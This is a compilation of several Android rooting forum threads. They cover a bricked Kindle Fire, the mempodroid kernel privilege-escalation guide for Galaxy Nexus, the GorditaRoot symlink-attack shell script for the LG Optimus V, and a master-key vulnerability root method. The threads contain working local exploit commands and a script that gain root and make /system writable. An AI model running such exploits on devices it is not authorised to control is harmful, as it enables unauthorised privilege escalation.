Develop Bugs

[Request]$ -- Modify zergRush to Not Need Build.prop File

I have a request with a small donation as a reward. I'm not rich, but I can reward with some beer money.
I have managed to somehow delete my build.prop file while rooted and then managed to un-root my device. Naturally, I rebooted.
My request is for anyone with a bit of extra time to modify zergRush so that it does not look to a build.prop file to verify the android version.
If there are any other ideas on how to root a bricked Fire without a build.prop file, be my guest.
My hope is that once I am able to re-root my device, I will be able to mount /system/ as writeable and then be able to push in a build.prop file. However, obviously, until that happens I cannot put in a build.prop file.
If you have any questions I pretty much let it all out on the "How to unblock your kindle" thread.
If no one is able to do this I would understand. This is obviously beyond my technical expertise but I do appreciate any efforts or even suggestions. Even if there's no attempts made here, it is still shocking how much help is given on this forum.
EDIT: I was able to get my hands on a valid system.img and then flashed the system.img to my system partition. Doing so corrected my build.prop and my device became bootable. Thanks for all the help.

Did it update to 6.2 while in the midst of your needing around?

what does your device do?
Does it show under adb devices?

ajq said:
Did it update to 6.2 while in the midst of your needing around?
Click to expand...
Click to collapse
I updated to 6.2 on Tuesday. I have followed the directions on the "UNBRICK your kindle" thread. I have done that successfully. However, because my build.prop is missing, I can no longer re-root using zergRush. I believe that fastboot as directed in that thread restores the kindle to factory settings. I'm not quite sure if factory settings is 6.2 or if it goes all the way back to 6.0.

death2all110 said:
what does your device do?
Does it show under adb devices?
Click to expand...
Click to collapse
This is the post I created in the "How to unbrick your kindle" thread. It should answer most questions. I can use adb shell on the device but I cannot mount anything and SU responds "permission denied".
----from the other thread----
I am in a similar situation and am trying to work through it. I thought I rooted my device but when I restarted it, it didn't fully load. I've successfully done all of the steps listed in the OP but am still suck in a black screen (it's lit...but it's black) loop.
I believe I have deleted my build.pop file but have a backup listend as build.prop.bak. However, the device is trying to load and is failing. I need to rename my build.prop.bak as the primary build.prop. I have tried to access SU through ADB but am getting "permission denied" almost as if my device wasn't rooted.
I have tried to mount system as RW but I am also getting permission denied.
Any advice. Here is my /system/
:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Admin>cd \KindleFireRoot\files
C:\KindleFireRoot\files>adb shell
adb server is out of date. killing...
* daemon started successfully *
$ cd /system/
cd /system/
$ ls -l
ls -l
drwxr-xr-x root root 1970-01-01 00:00 lost+found
drwxr-xr-x root root 2011-12-01 19:03 app
drwxr-xr-x root shell 2011-12-01 19:03 bin
drwxr-xr-x root root 2011-11-30 01:16 etc
drwxr-xr-x root root 2011-11-30 01:16 fonts
drwxr-xr-x root root 2011-11-30 01:16 framework
drwxr-xr-x root root 2011-11-30 01:16 lib
drwxr-xr-x root root 2011-11-30 01:16 media
drwxr-xr-x root root 2011-11-30 01:16 tts
drwxr-xr-x root root 2011-11-30 01:16 usr
drwxr-xr-x root shell 2011-11-30 01:16 vendor
drwxr-xr-x root shell 2011-12-01 19:03 xbin
-rw-r--r-- root root 2143 2008-08-01 12:00 build.prop.bak
$
EDIT: I have tried to re-root through the method provided as well as superoneclick root, but both have failed because no android system is being recognized. This may have to do with the lack of a proper build.prop on my device.
EDIT2: I figure the above might not be enough information so I will now post what I have done so far to get it bricked, and what I have already tried.
1. I tried the rooting method on rootkindlefire.com and it seemed successful. I then was able to set /system/ as RW via root explorer. I copied a modified build.prop file that is available in the android development forums. However, unfortunately, I believe I may have edited the name of this file or done something wrong in handling it accidentally. Regardless, I pasted this file in the /system/ folder and renamed my original build.prop file to build.prop.bak. I then restarted my kindle fire. Now, it shows the kindle fire screen for a second and then goes black entirely. It is still on (the screen is lit), but the screen is black. It then remains like this until I do a hard reset and then it repeats this process.
2. I have tried to access SU but have been unable to do so. I have been unable to mount system as RW using the instruction a page back. In both situations I get the "permission denied" response from the command line.
3. Everytime I try to root using the method provided in the OP, I get a message saying that it can't find android 2.2 or 2.3
4. I am unable to root again using super click for the same reason.
5. I have otherwise been able to follow all of the steps in the OP successfully, but to no avail. My screen goes black after it shows the kindle fire screen for a couple seconds.
6. Any suggestions would be very very helpful. From my amateur amount of knowledge, it seems to me that I don't have a build.prop in my /system/ but am unable to rename or access my build.prop.bak so that I can set it as the regular bootable build.prop. This is because, even though I thought I had it rooted, I am unable to set the /system/ directory as writable.
7. ANY SUGGESTIONS OR HELP WOULD BE GREAT!

Just as a disclaimer: I acknowledge I'm a moron for not verifying everything when I pushed in a build.prop file into my /system/ folder and restarted. No need to call me names

For those who know a bit more than me...
Would pushing the 6.2 update (or any of the downloadable firmware) to the kindleupdates folder in the sdcard and then rebooting fix my problem? I remember reading that the updates re-writes the build.prop which would fix my situation.
Of course, do you need root permissions to be able to write to the sdcard? I only ask this because I can not get the sdcard to actually show up on my desktop. I would need to push it via terminal or adb shell.
Anyone know if this would work?

I am beginning to realize that I may actually still have root, but since I can't boot up the phone, I can't fill out the superuser access dialog that usually comes up when a program tries to access superuser. I had root before I caused the build.prop problems, but figured that I had somehow lost it when I tried to access SU from ADB. Anyone know of a way to bypass this access dialog?

I checked the root status with OneClickRoot after OTA reported my KF was still rooted (just to be sure) and then re-installed Superuser and pushed the necessary Android APKs back to /system/app and it was working again.

damianarnold said:
I checked the root status with OneClickRoot after OTA reported my KF was still rooted (just to be sure) and then re-installed Superuser and pushed the necessary Android APKs back to /system/app and it was working again.
Click to expand...
Click to collapse
How did you re-install Superuser if you're not able to fully boot up the KF? To be clear, when I try to root with superoneclick it says i'm rooted (and if i try and continue it fails...) but whenever I type in adb shell and then su I get "permission denied."

ejrubin said:
How did you re-install Superuser if you're not able to fully boot up the KF? To be clear, when I try to root with superoneclick it says i'm rooted (and if i try and continue it fails...) but whenever I type in adb shell and then su I get "permission denied."
Click to expand...
Click to collapse
My Fire was fully booted up. Did you remove and reinstall Superuser?

damianarnold said:
My Fire was fully booted up. Did you remove and reinstall Superuser?
Click to expand...
Click to collapse
Don't think our KF were in the same state. I don't have a build.prop to boot my KF into so I can't manage superuser at all (I do, however, have a totally useless build.prop.bak that is sitting there in the directory. ) I have the superuser.apk in there so it seems as though I'm rooted but I still can't get into SU via adb.

Can't get Write access to /System or /SDCard
ejrubin said:
Don't think our KF were in the same state. I don't have a build.prop to boot my KF into so I can't manage superuser at all (I do, however, have a totally useless build.prop.bak that is sitting there in the directory. ) I have the superuser.apk in there so it seems as though I'm rooted but I still can't get into SU via adb.
Click to expand...
Click to collapse
Still having the exact same problem! Was able to get the build.prob.bak pulled from /system but can't rename it and push it back to hopefully get this working again.
I am starting to think I may have to send this KF back soon if I don't get it working again.
Any help anyone can provide would be great.

I'm thinking since we are able to get into fastboot, do any developers know if it is possible to push in a new system.img via fastboot? This would solve our build.prop problems no? Any developers know if this is possible?

I would like to compile zergRush myself, but I don't know how to compile Android binary.
It seems require linux to do so.

Can you adb push to the sdcard?
Sent from my DROID Pro using XDA App

JackpotClavin said:
Can you adb push to the sdcard?
Sent from my DROID Pro using XDA App
Click to expand...
Click to collapse
No , I think the sdcard is not yet mount. Tried cd sdcard and it's not possible.
Is it possible to mount it without root? Cause when we try to mount system folder it's permission denied.
And I'm afraid the system won't run the official update even the patch is inside the sdcard folder.
I think ejrubin's idea on how to fix our bricked kindle fire is completely right , we just need either one of the following :
1. A zergRush binary won't check the build.prop to let us run root and mount the system folder
2. Since we can get into fastboot, I think we need a correct update.zip or system.img to fix it. Any idea to build it from kindle's official update?

Well try "mount sdcard" in the shell. If you can push the update, you can idme bootmode into 0x5001 and it'll take the update in recovery mode
If that doesn't work I'll give a custom zerg a shot
Edit: I got it. If you wanna flash my clockwork build in fastboot and set the fastboot to boot into recovery, you can access your /system through recovery, I do it all the time
It'll be a fastboot flash recovery <the name of the recovery.img I'll post later when I get home>
From there you will have to:
Adb shell
Mount system
Mv /system/build.bak /system/build.prop
Sent from my DROID Pro using XDA App

JackpotClavin said:
Well try "mount sdcard" in the shell. If you can push the update, you can idme bootmode into 0x5001 and it'll take the update in recovery mode
If that doesn't work I'll give a custom zerg a shot
Edit: I got it. If you wanna flash my clockwork build in fastboot and set the fastboot to boot into recovery, you can access your /system through recovery, I do it all the time
It'll be a fastboot flash recovery <the name of the recovery.img I'll post later when I get home>
From there you will have to:
Adb shell
Mount system
Mv /system/build.bak /system/build.prop
Sent from my DROID Pro using XDA App
Click to expand...
Click to collapse
If i just type "mount sdcard" it cannot recognize the command.
if try to mount it with -t and mount it to other folder, it just say permission denied.
Of course I wanna flash your clockwork build!!
Would you mind to guide us with all the step when you're ready? Because I'm quite new to root android machine.
Really thanks for your help!!!!!!!!!!!!!!!!

Yeah **** sorry guys can this wait till tomorrow? Sorry I said tonight, I got side tracked tonight
Sent from my DROID Pro using XDA App

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)

[HOW-TO] [GSM & CDMA] Root without Unlocking Bootloader via exploit (for 4.0.1/4.0.2)
Edit: This does not works on anything newer than ICL53F (i.e., 4.0.2). It works fine on ITL41D (4.0.1), ITL41F (4.0.1) and ICL53F (4.0.2)
Once you have got root, you can now use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!
Disclaimer: I take no credit for this exploit or the implementation of it (but I will take credit for the step-by step ). Thanks to kendong2 for pointing it out to me here.
So, it looks like zx2c4 has found a local privilege escalation exploit. See source here, and saurik has managed to package it together for Android. See here. Although this may be old news to some, I hadn't seen it before.
So what does this all mean:
If you are running a 2.6.39 kernel (or above), which all Galaxy Nexus' are, you can now root your device without having to unlock your bootloader (and without losing your data).
Moreover, you should now be able to root your device even if your hardware buttons are not working.
Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.
Notes:
1) This assumes that you have USB Debugging enable on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
2) This needs to be done over ADB, as a terminal emulator on-device does not have the appropriate access. If you do not have ADB, I've attached it in the zip. Unzip all files.
3) Some users indicate that, once finished the procedure, they needed to open the Superuser app.
Step-by-step:
1) Download the attached files to your computer and unzip them in the same directory as your adb.exe file;
2) Open a command prompt in the same directory;
3) Copy the files to your device:
adb push mempodroid /data/local/tmp/mempodroid
adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Open a shell: adb shell
5) Change permission on mempodroid to allow it to run: chmod 777 /data/local/tmp/mempodroid
6) Run the exploit: ./data/local/tmp/mempodroid 0xd7f4 0xad4b sh
Note: Once you do step 6, your prompt should change from $ to #. If not, it did not work.
7) Mount the system partition as rw: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
8) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
9) Change permissions on su: chmod 06755 /system/bin/su
10) Copy Superuser.apk: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
11) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
12) Mount the system partition as r/o: mount -o remount,ro -t ext4 /dev/block/mmcblk0p1 /system
13) Rescind root: exit
14) Exit the ADB shell: exit
15) Done. You now should have root without having to unlock your bootloader.

Reserved

Reserved

This is the same as https://github.com/saurik/mempodroid
saurik ftw.

times_infinity said:
This is the same as https://github.com/saurik/mempodroid
saurik ftw.
Click to expand...
Click to collapse
Not sure what you are getting at? I mentioned saurik in the first post, and the link you posted is in the first post. And I mentioned that this may be old news, but I haven't seen it anywhere before today in the GN forums.

Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!

Sleuth255 said:
Yikes! This exploit works on any kernel from 2.6.39 and >. This could become a common root method for many devices. Linus Torvalds himself posted the fix commit! Nice work by zx2c4!
Click to expand...
Click to collapse
You need ics to have a vulnerable kernel version, so given the number of devices which currently have ics officially, I doubt it will be common. I'd also expect Google and vendors to correct this in next release.
Also many custom kernels don't have this flaw as they are at or over 3.0.18 or have patched it. This prevents gaining unnoticed root.
Sent from my Galaxy Nexus

Hmmm I thought 2.6.39 was found in GB builds. This exploit is almost a root fix for the Moto DX 4.5.621 fiasco. Unfortunately the kernel for that build is 2.6.32.9.
Sent from my Galaxy Nexus using xda premium

This was huge in the headlines a few weeks back. It's nice to see someone putting it to a good use!
Sent from my Galaxy Nexus using xda premium

Hi, been lurking awhile, registered to clear up somethings.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.

Huxleysäl said:
Hi, been lurking awhile, registered to clear up somethings.
I did some research while attempting to access the /data/local/ -folder with terminal emulator and I found that it would be impossible to write or to find it while being unrooted. Rooting a phone through using an unrooted access root seems impossible.
Did I miss something or is there any other way to copy mempodroid to the data- folder? I sure would like to keep all my files.
Click to expand...
Click to collapse
I think you are mistaken. In a terminal emulator type: cd /data/local/tmp
Edit: Fixed a mistake made by auto correct...
Sent from my Galaxy Nexus using Tapatalk

efrant said:
I think you are mistaken. In a terminal emulator type: cd /data/local/temp
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links

try /data/local/tmp

Huxleysäl said:
Just did. It says "No such file or directory."
Not the best source, but if you google it, people state what I state. Sorry, can't post links
Click to expand...
Click to collapse
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk

efrant said:
Sorry, damn auto correct. It should be: cd /data/local/tmp
Not "temp".
It works fine.
Edit: Sleuth255 beat me to it!
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, puting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb

Huxleysäl said:
Sure, OK, it worked. But as I'm trying to replicate his instructions, copying mempodroid to data/local/tmp doesn't compute. I tried extracting the files, puting mempodroid in a new folder in ./sdcard/ (which I named Nex), and it still couldn't find it.
Wait, just had an idea. Brb
Click to expand...
Click to collapse
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk

OK, this is exactly what I did:
I downloaded the files, extracted them into the ./sdcard folder of my android. I opened the console, wrote exactly as stated. Reaction? Cannot create /data/local/tmp/mempodroid: Permission denied
So, what I'm thinking is this: I tried the cd ./sdcard/mempodroid, found it. So, logically, that should mean that since the permission is dennied, the problem lies not in where I put the mempodroid, but with my authority over my phone. So, here we are again. Could anybody smarter then me clarify?
efrant said:
Hmm. Looks like you may be correct. In GB, we had write access to that directory, but it looks like we don't in ICS. I'll have another look tomorrow and try to figure something out.
Sent from my Galaxy Nexus using Tapatalk
Click to expand...
Click to collapse
****, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.

Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.

convolution said:
Might want to expand on the steps.
Like what program to use to copy the file.
How do you change permission.
How do you run the exploit.
How to mount rw.
How to copy su.
Click to expand...
Click to collapse
I hade my initial problems with that too. But as if this moment it doesn't really matter. Read above posts. Anyhow, to answer your question: you need to download a console emulator
Just search for it in the market. Also the commands go in this console
For example: cat /directory/filename > /newdirectory/samefilename means to copy or move from one place. To change permission you just write that line of code ending with 777 instead of cat and then the filename etc and etc.
I didn't know any of this 'till yesterday, so it is quite understandable.
cheers

Huxleysäl said:
F***, I was hoping I was wrong. I originally thought that the exploit was this. But alas.
Try finding an alternative write route to the /data/local/- folder. That should solve all problems, I guess. Big words, ey? This is for the simpletons like me, who stupidly forgot to bootload.
Click to expand...
Click to collapse
I've updated the first post. Give that a go and let me know how it turns out. (The guide may need some minor tweaking, but I am here to help you through it.)
It seems that ADB has rw access to /data/local/tmp but a terminal emulator on-device does not. So for now, you need to be plugged into your computer.
It may be possible to do this with ADB-over-Wi-Fi, but I haven't gotten there yet.

Gordita Root: Optimus V exploit March 24th 2012

This is an exploit, I take NO RESPONSIBILITY if this does ANYTHING bad, your fault not mine, it was only tested on the firmware mentioned below. If you redistribute it, republish, work it into a all in one click, please link back and PROPERLY credit me.
Tested on the
ro.build.date=Mon Jan 30 10:42:53 KST 2012
ro.build.version.incremental=ZV9.479A6632
Update for the VirginMobile LG Optimus V
Your phone needs to be updated to the above build, and potentially needs a factory reset before this works, but it works fine. This will allow you to flash recovery without being root. After flashing recovery, flash this zip http://dl.dropbox.com/u/8699733/rootme.zip to install su, superuser and disable re-flashing of the stock re covery
LinuxMac Script + files:
https://github.com/CunningLogic/GorditaRoot
Flash_image:
https://github.com/CunningLogic/GorditaRoot/blob/master/flash_image
Recovery:
http://www.mediafire.com/?vzc5k8taj9smmll (Credit BobZhome)
Windows users run the commands manually
GNU nano 2.2.2 File: Gordita.sh
Code:
#!/bin/sh
echo "GorditaRoot 1.0 by jcase / TeamAndIRC"
echo "for the VM670 Optimus V"
echo "March 21st 2012"
echo "Follow me! http://www.twitter.com/TeamAndIRC"
echo "Donations are optional http://forum.xda-developers.com/donatetome.php?u=2376614"
echo "-"
echo "Recovery taken from http://forum.xda-developers.com/showthread.php?t=1197991"
echo "-"
echo "Pushing recovery to /data/local/"
adb push VM670NH_recovery.img /data/local/recovery.img
adb push flash_image /data/local/
adb shell "chmod 755 /data/local/flash_image"
echo "Removing old sensor config, setting up symlink attack"
adb shell "rm /data/amit/*"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config.ini"
adb shell "ln -s /dev/mtd/mtd2 /data/amit/AMI304_Config2.ini"
echo "Rebooting to execute symlink attack, to chmod 666 the recovery block device"
adb reboot
adb wait-for-device
sleep 10
adb shell "rm /data/amit/*"
adb shell "/data/local/flash_image recovery /data/local/recovery.img"
echo "Recovery flashed! Enjoy"
Having trouble identifying whether or not you completed the root process? Quickly test for root access with Root Checker Basic

Confirmed working on a phone donated just for this purpose!
Started with stock firmware, Android 2.2.1, baseband VM670ZV4_60401001, generic android recovery
Flashed the VirginMobile Security Update from their website, became VM670ZV9_60401001 ZV9.479A6632
Manually walked through above script by jcase via gtalk, and using the exploit, was able to flash BobZhome's CWM for the VM670, reboot into it and made a backup.
Flashed the su zip, and all is well in Optimus V land again.
HUGE THANKS TO JCASE FOR TAKING THE TIME TO RE-ROOT THE VM670!!!

I only wish I understood what it all meant--so I could be excited, too!

wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
Click to expand...
Click to collapse
Means ppl who couldnt root before, now can

wilberfan said:
I only wish I understood what it all meant--so I could be excited, too!
Click to expand...
Click to collapse
i was gonna ask the same thing LOL

Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!

jlear3 said:
Hey! Sorry, I'm a ET4G user, just trying to put ICS on my girl's phone so she stops whining
Anyways, I presume there's an update being pushed to all optimus v's? If so would you happen to know how I could update hers? Or would it be easier to stay on the current version ( i belive v5???) and root a different way??
Also, great work on an exploit so soon after a release! Happy to join (kinda) the Optimus family!
Click to expand...
Click to collapse
The update is not being pushed, because the OTA mechanism doesn't work on the OV. You have to go to the VM website and download the update from the phone FAQ.
The only advantage is a new radio, which give slightly improved performance.

Thank you very much!
I installed the update to my (unmodded) backup phone without thinking about whether or not I'd be able to root the handset after applying it. DOH!
I have just been using this phone as a WiFi device so far. I have run the battery down and recharged it once and installed a few apps on it. So I will run it down, recharge it again and then do a factory reset before I try rooting it just to make sure that I don't hose it.

It's a good idea to check all the steps before you start ...
Finally ran my battery down for the second time. So, I recharged, ran a factory re-set and ran the shell script on my Linux box to root the phone.
Oops!
The file VM670NH_recovery.img downloaded as VM670NH_recovery.bin and the system can't find/stat it! Hit ^C and bailed!
Hoping, hoping, hoping ...
Good! It's not bricked!
Renamed the recovery file, re-ran the script. Success!!
Rebooted into recovery, flashed rootme.zip
==> Did a nandroid backup.
Downloaded root check basic app and confirmed that it has worked.
So, for other modders trying this out:
Check your files and file names before you start! When I looked at Gordita.sh the first time I found that what I had downloaded was an HTML file with the script embedded in it. Copied and pasted from the OP and then checked again to make sure I had the right content.
Of course if you are running the adb commands manually then this won't happen to you.
But, as I noted above, I didn't cross-check that the recovery file that the script would be looking for had the right file name extension (.img, not .bin), so don't be me.
That said, jcase: Thank You Very Much!! Not only for developing this root exploit but also for making one that is robust enough for someone like me to goober it up and still come out unburnt!

After all of this , can you make it a hotspot in quick settings?

The setting dialog is there ..
H0daddy said:
After all of this , can you make it a hotspot in quick settings?
Click to expand...
Click to collapse
Once I rooted my phone I installed a modified ROM. And then another one, and then ...
I saw your question a bit ago and since I no longer had the stock ROM installed (and had never used Quick Settings to enable the hotspot feature before) I didn't know. I still don't. Here is the story on that ...
I just restored the ZV9 ROM from backup today and then installed the Quick Settings app. I can say that the app still has the option to enable the hotspot available and that it tries to set it up. However the phone I am using hasn't been activated yet and the 3G network isn't provisioned on it. So all I get is a message saying the network isn't available.
So, it looks somewhat promising. Maybe someone who has an activated phone with the ZV9 ROM can test it out and let you know.
And if I activate this phone before you get a useful reply I'll test it to see if it works.

So happy to see this

Please assist
Got up to step adb shell "chmod 755 /data/local/flash_image"
But got back "no such file."

CWM
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?

knicks791 said:
Got up to CWM but it won't let me select install zip from sd card. Any suggestions?
Click to expand...
Click to collapse
so you have bobz recovery installed?... i assume youve tried rebooting to recovery form the powered off state via the key combo (HOLD home+vol down+power, RELEASE after the LG logo), and tried instal zip from sd again?...
try:
http://forums.projectopencannibal.net/beta-releases-11/lg-optimus-v-v2-1dev1-(10-09-2012)/
http://forums.projectopencannibal.n...1-universal-installer-for-lg-optimus-devices/

Rooting Hell Since 4.2.1

So I usually use the toolkit to root, in fact I have been for many versions now.
However with the installation of 4.2.1 I haven't been able to root at all. I use the toolkit in the same way but it simply doesn't root the phone.
So today I tried the manual way. I downloaded and installed SDK tools from google navigated to the adb folder and went through the commands. Everything seemed to go okay apart from when I typed adb shell chmod 06755 /system/bin/su. The command window did nothing.
I carried on and typed adb shell chmod 06755 /system/app/Superuser.apk, when it said "bad command" or something similar.
Rebooted the phone, no root... still.
However the Superuser app is there. So:
1) How do I delete the superuser app, bearing in mind it has system permissions. I'd like to simply start again.
2) I don't have CW recovery installed and would prefer not to bother with it if I can.
3) Just to confirm, when I root the phone, does that allow me to delete files in the /system/app folder?
4) Following this guide on rooting manually. Is that all alright?
5) In a couple of sentences, can someone explain rooting to me? From what I understood, rooting simply opens up the phone to allow access to everywhere, where you can copy and delete files, or apks.
6) If 5 is true, when following the rooting guide (4), which command am I actually telling the system to run as root? Is it simply the "root" command?
7) If 6 is true, how come when I re-boot, the phone won't let me delete things from the system/app folder?
Thanks for any help.

1) stop using a toolkit, and no you didnt root the manual way.
2) download this: http://forum.xda-developers.com/showthread.php?t=1538053 - its supersu, superuser is unreliable on 4.2+
3) fastboot flash a recovery
4) flash the supersu.zip
5) done.

Sorry, I should have explained the Su app is SuperSU.
Just gave it another go using a manual toolkit but still no root access. I also now have an su.apk, superuser.apk (SuperSU) and a su file. Need to delete them all.
What do you mean by "fastboot flash a recovery"? You mean flash a new recovery centre like CW?
Don't these superuser apps just manage app permissions? They don't actually enable the root access do they?
Thanks

anotherxdauser said:
Sorry, I should have explained the Su app is SuperSU.
Just gave it another go using a manual toolkit but still no root access. I also now have an su.apk, superuser.apk (SuperSU) and a su file. Need to delete them all.
What do you mean by "fastboot flash a recovery"? You mean flash a new recovery centre like CW?
Thanks
Click to expand...
Click to collapse
follow this: http://forum.xda-developers.com/showthread.php?t=1529058

Quick Q...
If I flash a 4.2.1 system.img to the phone, it will replace what exactly?
I'm thinking this might be a way to get rid of the root apps which are protected and allow me to update to 4.2.2, THEN look at manually rooting.

anotherxdauser said:
Quick Q...
If I flash a 4.2.1 system.img to the phone, it will replace what exactly?
I'm thinking this might be a way to get rid of the root apps which are protected and allow me to update to 4.2.2, THEN look at manually rooting.
Click to expand...
Click to collapse
it replaces anything in /system... basically the OS.

[NOW WORKS] Obtaining root with master key vulnerability

One click root with impactor now works. Works on <4.3. No need for unlocked bootloader. Does not wipe data.
http://www.saurik.com/id/17

Copy over the superuser.apk and the such binary onto your phone, then use the MV command to move it to /system/app and /system/xbin respectively.
Beamed from my Grouper

Mach3.2 said:
Copy over the superuser.apk and the such binary onto your phone, then use the MV command to move it to /system/app and /system/xbin respectively.
Beamed from my Grouper
Click to expand...
Click to collapse
What should the permissions on each be?
EDIT: Can you alternatively only push the su binary and download superuser from gplay?

krackers said:
What should the permissions on each be?
EDIT: Can you alternatively only push the su binary and download superuser from gplay?
Click to expand...
Click to collapse
If the binary is wrong, the one from play store may not work.
Permission should be rw-r-r(0644) for the su.apk and rwsr-sr-x(0645) for the su binary.
Beamed from my Maguro.

I tried it myself and while it appears that commands do run, they don't appear to work. I think it might have to do with running as system vs running as root. Why else would saurik use an indirect method of gaining root (using ro.kernel.quemu) as opposed to directly pushing the su binaries.

krackers said:
I tried it myself and while it appears that commands do run, they don't appear to work. I think it might have to do with running as system vs running as root. Why else would saurik use an indirect method of gaining root (using ro.kernel.quemu) as opposed to directly pushing the su binaries.
Click to expand...
Click to collapse
This is correct: sometime in the Android 4.1 release cycle, they removed the ability to use /data/local.prop as an attack vector to go from system->root. The signature bug lets you modify the code of any APK, but the most powerful user an app can ever run as is system, not root.
However, in an update to Impactor today, I've added a system->root escalation. This allows one-click rooting, and even though the system->root I'm using has already been patched in AOSP (the idea was not to waste something to go along with a shell->system that is already long burned) it works on my 4.2.2 Nexus 4 (and so I'd imagine will also work fine on a Galaxy Nexus) as Android sucks at getting patches to real devices ;P.

Using Impactor on my Panasonic Eluga dl01 does somehow not work.
(Android 4.0.4)
I get following error message:
/data/local/tmp/impactor-6[3]: /data/local/tmp/impactor-4: Operation not permitted
I also tried and played around with the command line in Impactor.
"adb devices" won't list my phone
But when I use the adb from the current Android SDK I just installed, it will display my phone with "adb devices".
I also downloaded a ICS 4.04 root zip file with a script and adb files inside. When using that adb version, my phone won't be displayed too. Now when I run adb from the android SDK, it will say something like "server is outdated" then something like "kill and restart with new server" --> "adb devices" lists my phone correctly again.
May be the adb version used in Impactor is outdated and responsible for the error message?
I would really appreciate any help with this topic, because the Panasonic Eluga phone was never rooted until now and no known root method is available. I always kinda hoped that someone would use the masterkey thing to make a universal rooting tool

saurik said:
This is correct: sometime in the Android 4.1 release cycle, they removed the ability to use /data/local.prop as an attack vector to go from system->root. The signature bug lets you modify the code of any APK, but the most powerful user an app can ever run as is system, not root.
However, in an update to Impactor today, I've added a system->root escalation. This allows one-click rooting, and even though the system->root I'm using has already been patched in AOSP (the idea was not to waste something to go along with a shell->system that is already long burned) it works on my 4.2.2 Nexus 4 (and so I'd imagine will also work fine on a Galaxy Nexus) as Android sucks at getting patches to real devices ;P.
Click to expand...
Click to collapse
Do you need to have an unlocked bootloader for the root exploit to work? I am hoping to get root without having to wipe the device by unlocking.
To the poster above me: Try using a different computer and if that doesn't work, switch operating systems.

krackers said:
Do you need to have an unlocked bootloader for the root exploit to work? I am hoping to get root without having to wipe the device by unlocking.
Click to expand...
Click to collapse
That's the whole point in securing Android, not that people have easier ways instead of unlocking a device.

Tested and works great. I now have root. Yay!

Does it show any of the problems that chainfire's superSU 1.41 shows?
Sent from my Galaxy Nexus using xda app-developers app

The root exploit only places the su binary and sets the right permissions. You can use any root manager you want (I used clockworkmod's superuser app).

mercuriussan said:
Using Impactor on my Panasonic Eluga dl01 does somehow not work.
(Android 4.0.4)
Click to expand...
Click to collapse
The feature of installing su will not work on every device: a lot of emphasis is put on "rooting" Android devices, but on many devices even root can't do things like modify the files in /system; I'd use the term "jailbreak" as to being what people really want to do with their device, but Android people seem to have that term ;P. What this means is that you really need a kernel exploit, not just a shell->system->root escalation.
mercuriussan said:
I get following error message:
/data/local/tmp/impactor-6[3]: /data/local/tmp/impactor-4: Operation not permitted
Click to expand...
Click to collapse
This error message actually indicates that Impactor succeeded in obtaining root control over your phone. However, when it tried to then, as root, remount /system writable so it could copy the su binary in place, it wasn't allowed to do so. A future version of Impactor will make it easier to drop to a root shell so you can test things out manually, but this means that while you can run code as root, you won't be able to install su.
However, if you have the time to play with it, get a copy of busybox and use adb to push it to /data/local/tmp (this is also something Impactor should help you do, but does not yet). (You will also need to make it executable, don't forget: "chmod 755 /data/local/tmp/busybox".) Then run the suggested Impactor command involving telnetd. Finally, via a shell, run "/data/local/tmp/busybox telnet 127.0.0.1 8899": you are now root.
You can verify that you are root because you will now have a # as a prompt instead of a $. Then run "mount -o remount,rw '' /system" (<- note, that's two single quotation marks as an argument between remount,rw and /system). This is the command that should fail with the "Operation not permitted" message. You are, however, root, so maybe there's something you want to do on the device at that point ;P.
mercuriussan said:
I also tried and played around with the command line in Impactor.
"adb devices" won't list my phone
But when I use the adb from the current Android SDK I just installed, it will display my phone with "adb devices".
Click to expand...
Click to collapse
The "Open Shell" in Impactor connects you to the device via adb: if you run adb on the device and ask for a list of devices attached to the device--something I didn't even realize was possible until you pointed it out here ;P I tested it, though, and wow: that actually is possible--you will get a blank list. However, suffice it to say that if you were able to type that at all, it can see your device.

Thanks for the suggestion, I'll try my luck in finding some exploit I can use...

So since Google patched this in 4.3, does this mean almost all devices before 4.2.2 can be rooted with this method?

